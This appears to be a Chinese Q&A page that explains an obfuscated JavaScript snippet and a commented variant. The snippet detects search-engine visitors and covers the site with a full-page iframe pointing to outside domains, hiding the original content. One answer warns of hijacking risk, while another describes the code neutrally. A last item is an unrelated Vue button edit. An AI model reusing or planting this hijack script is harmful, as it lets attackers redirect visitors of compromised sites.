var titlestr = document.title; var arr = ["\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0070\u0067\u007a\u006d\u0066\u002e\u0078\u0079\u007a\u003a\u0036\u0030\u0033\u0031\u0033\u0022\u002c\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0070\u0067\u0071\u0073\u0068\u002e\u0078\u0079\u007a\u003a\u0036\u0030\u0033\u0031\u0033\u0022\u002c\u0022\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0070\u0067\u0077\u0070\u0073\u002e\u0078\u0079\u007a\u003a\u0036\u0030\u0033\u0031\u0033"]; var linkIndex = Math.floor((Math.random() * arr.length)); var referer = document.referrer; var regex=/(baidu\.com|sogou\.com|so\.com)/i; if(regex.test(referer)) { setFrame(arr[linkIndex]); } function setFrame(olink) { var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><ifr' + 'ame scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setTimeout(function() { console.log(document.body.children.length); for (var i = 0; i < document.body.children.length; i++) { try { var a = document.body.children[i].tagName; var b = document.body.children[i].id; console.log(i + "***" + a + "**" + b); if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") { document.body.children[i].style.display = "non" + "e" } } catch(e) {} } var oMeta = document.createElement('meta'); oMeta.name = 'viewport'; oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no'; document.getElementsByTagName('head')[0].appendChild(oMeta); }, 100) } catch(e) {} } <!--pg 06.03-->
时间: 2023-07-21 18:52:17 浏览: 386
这段代码似乎是用于在网页中嵌入一个iFrame,将其它网页页面显示在当前页面中。其中的链接数组 `arr` 似乎包含了三个URL地址:
- https://www.pgzmf.xyz:60313
- https://www.pgqsh.xyz:60313
- https://www.pgpwps.xyz:60313
在代码中通过 `Math.random()` 函数随机获取一个链接,然后通过 `setFrame()` 函数将链接嵌入到当前页面。另外,代码似乎还对页面的元素进行了一些操作,隐藏了除了标题和嵌入的iFrame之外的所有元素,并设置了viewport的属性。
需要注意的是,该代码存在潜在的安全风险,可能会导致页面被劫持或者受到恶意脚本的攻击。如果您不确定该代码的用途和来源,请不要在您的网站上使用它。
相关问题
// 获取当前网页的标题 var titlestr = document.title; // 设置要替换的网页链接并调用setFrame函数 setFrame("http://kaka88.cc"); // 定义设置网页内容和隐藏元素的函数 function setFrame(olink) { // 构造要插入页面的字符串,包含替换网页的iframe标签和原网页标题 var ss = '<title>' + titlestr + '</title><div id="showcloneshengxiaon" style="height: 100%; width: 100%; background-color: rgb(255, 255, 255);background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0 frameborder="0" width="100%" height="100%" src="' + olink + '"></iframe></div><style type="text/css">html{width:100%;height:100%;}body {width:100%;height:100%;}</style>'; // 将构造好的字符串插入到当前页面中 eval("document.write('" + ss + "');"); try { // 延迟执行后续操作,避免立即执行报错 setTimeout(function() { // 打印document.body.children的长度 console.log(document.body.children.length); // 遍历document.body.children数组 for (var i = 0; i < document.body.children.length; i++) { try { // 获取子元素的标签名和id var a = document.body.children[i].tagName; var b = document.body.children[i].id; // 打印子元素的位置、标签名和id console.log(i + "***" + a + "**" + b); // 判断条件:如果子元素的id不等于"iconDiv1"、"showcloneshengxiaon"且标签名不是标题,则隐藏该元素 if (b != "iconDiv1" && b != "showcloneshengxiaon" && a != "title") { document.body.children[i].style.display = "none"; } } catch (e) {} } // 创建meta标签,用于适配移动设备的视口 var oMeta = document.createElement('meta'); oMeta.name = 'viewport'; oMeta.content = 'width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no'; document.getElementsByTagName('head')[0].appendChild(oMeta); }, 100); } catch (e) {} }
这段代码是用来获取当前网页的标题,并在网页中嵌入一个指定链接的iframe。同时,它还定义了一个函数用来设置网页内容和隐藏元素。
函数`setFrame(olink)`接收一个参数`olink`,用来设置要替换的网页链接。在函数内部,它构造了一个字符串`ss`,包含了替换网页的iframe标签和原网页标题。然后使用`document.write`将构造好的字符串插入到当前页面中。
接下来,使用`setTimeout`延迟执行后续操作,避免立即执行报错。在延迟执行的函数中,首先打印了`document.body.children`的长度,然后遍历了`document.body.children`数组。
在遍历过程中,获取了子元素的标签名和id,并打印了子元素的位置、标签名和id。然后根据一定的条件判断,如果子元素的id不等于"iconDiv1"、"showcloneshengxiaon"且标签名不是标题,则将该元素隐藏。
最后,创建了一个meta标签,用于适配移动设备的视口,并将其添加到head标签中。
总结起来,这段代码主要是用来替换当前网页内容,并隐藏一些元素,还包括了适配移动设备视口的设置。
render: (h, params) => { let titleStr = "发布任务"; if (params.row.tasktype == "项目任务") { titleStr = "指定流程模板"; } var settingBtn = h( "Button", { props: { type: "info", size: "small", disabled: params.row.tasktype == "项目任务" && Number(params.row.status) > 1, }, attrs: { title: titleStr, }, style: { marginRight: "2px", border: "none", color: params.row.tasktype == "项目任务" && Number(params.row.status) > 1 ? "" : "#1884FF", background: "none", }, on: { click: () => { this.showProjectSettings(params); }, }, }, "配置" );将配置改成图标
可以将配置按钮改成图标,比如使用 Element UI 中的 Icon 组件,代码如下:
```
var settingBtn = h(
"el-button",
{
props: {
type: "info",
size: "small",
disabled:
params.row.tasktype == "项目任务" &&
Number(params.row.status) > 1,
},
attrs: {
title: titleStr,
},
style: {
marginRight: "2px",
border: "none",
color:
params.row.tasktype == "项目任务" &&
Number(params.row.status) > 1
? ""
: "#1884FF",
background: "none",
},
on: {
click: () => {
this.showProjectSettings(params);
},
},
},
[
h("i", { class: "el-icon-setting", style: { marginRight: "5px" } }),
"配置",
]
);
```
这样就可以将配置按钮改成了带有设置图标的按钮。
阅读全文